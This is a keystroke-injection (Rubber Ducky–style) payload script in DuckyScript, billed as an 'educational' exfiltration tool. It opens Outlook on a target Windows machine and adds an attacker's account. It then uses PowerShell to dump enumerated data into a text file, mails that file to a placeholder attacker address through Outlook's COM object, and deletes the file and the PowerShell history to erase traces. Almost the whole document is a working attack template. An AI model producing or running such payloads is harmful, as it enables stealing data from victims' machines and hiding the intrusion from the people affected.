REM -------------------------- 
REM -
REM - __         __   ____   _        ___      __     ____     ______      _____      ___     _    ___________________________________________________________________________
REM - |  \    ___) \  \  /  / \    ___) (_    _) \   |    \   |      )    (     )    (   \   | )  /                                                                           |
REM - |   |  (__    \  \/  /   |  (__     |  |    |  |     |  |     /      \   /      \   |  |/  /      This tool is made for educational purposes only and should only       |
REM - |   |   __)    |    |    |   __)    |  |    |  |     |  |    (   ()   ) (   ()   )  |     (       be tested on machines that you have permission to target.             |
REM - |   |  (___   /  /\  \   |  (      _|  |_   |  |__   |  |__   \      /   \      /   |  |\  \                                                                            |
REM - |__/       )_/  /__\  \_/    \____(      )_/      )_/      )___)    (_____)    (___/   |_)  \_____v.2.0_________________________________________________________________|
REM -
REM -------------------------- 

REM - TOOL REQUIREMENTS
REM - [*] Requires Outlook to be enabled on the target Windows machine.
REM - [*] Requires an internet connection on the target Windows machine.
REM - [*] Requires you to fill in the blanks in this script.
REM -------------------------- 

REM - Step 1: Add an Outlook account (If one already exists then the payload will just walk through the commands without changing anything)
REM -------------------------- 

DELAY 500
GUI r
DELAY 500
STRING outlook
DELAY 500
ENTER

DELAY 5000
ALT F
DELAY 500
RIGHT
DELAY 500
ENTER
DELAY 500
STRING <ATTACKER EMAIL>
DELAY 500
ENTER
DELAY 2000
STRING <ATTACKER EMAIL'S PASSWORD>
DELAY 500
ENTER
DELAY 2000
ENTER
DELAY 500
ALT F4
REM -------------------------- 

REM - Step 2: Launch PowerShell.exe 
REM -------------------------- 

DELAY 500
GUI r
DELAY 500
STRING PowerShell.exe
DELAY 500
ENTER
REM -------------------------- 

REM - Step 3: Enumerate the target data and redirect it to a text file
REM -------------------------- 

DELAY 2000
STRING echo '<POWERSHELL COMMAND>' > <FILENAME>.txt
DELAY 500
ENTER

DELAY 500
STRING echo '<POWERSHELL COMMAND>' > <FILENAME>.txt
DELAY 500
ENTER

DELAY 500
STRING echo '<POWERSHELL COMMAND>' > <FILENAME>.txt
DELAY 500
ENTER

REM - [...]
REM -------------------------- 

REM - Step 4: Exfiltrate the text file containing the loot using Outlook
REM -------------------------- 

DELAY 500
STRING $<VARIABLE NAME> = pwd
DELAY 500
ENTER
DELAY 500
STRING $ATTACHMENT = "$<VARIABLE NAME>\<FILENAME>.txt"
DELAY 500
ENTER
DELAY 500
STRING $outlook = New-Object -comobject outlook.application
DELAY 500
ENTER
DELAY 500
STRING $email = $outlook.CreateItem(0)
DELAY 500
ENTER
DELAY 500
STRING $email.To = "<ATTACKER EMAIL>"
DELAY 500
ENTER
DELAY 500
STRING $email.Subject = "<SUBJECT>"
DELAY 500
ENTER
STRING $email.Body = "<BODY>"
DELAY 500
ENTER
DELAY 500
STRING $email.Attachments.add($ATTACHMENT)
DELAY 500
ENTER
DELAY 500
STRING $email.Send()
DELAY 500
ENTER
DELAY 500
STRING $outlook.Quit()
DELAY 500
ENTER
REM -------------------------- 

REM - Step 5: Erase our tracks from the target machine
REM -------------------------- 

DELAY 500
STRING del <FILENAME>.txt
DELAY 500
ENTER

DELAY 500
STRING Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
DELAY 500
ENTER
REM -------------------------- 

REM - ADDITIONAL COMMANDS
REM - Check PowerShell History: Get-Content (Get-PSReadlineOption).HistorySavePath
REM -------------------------- 
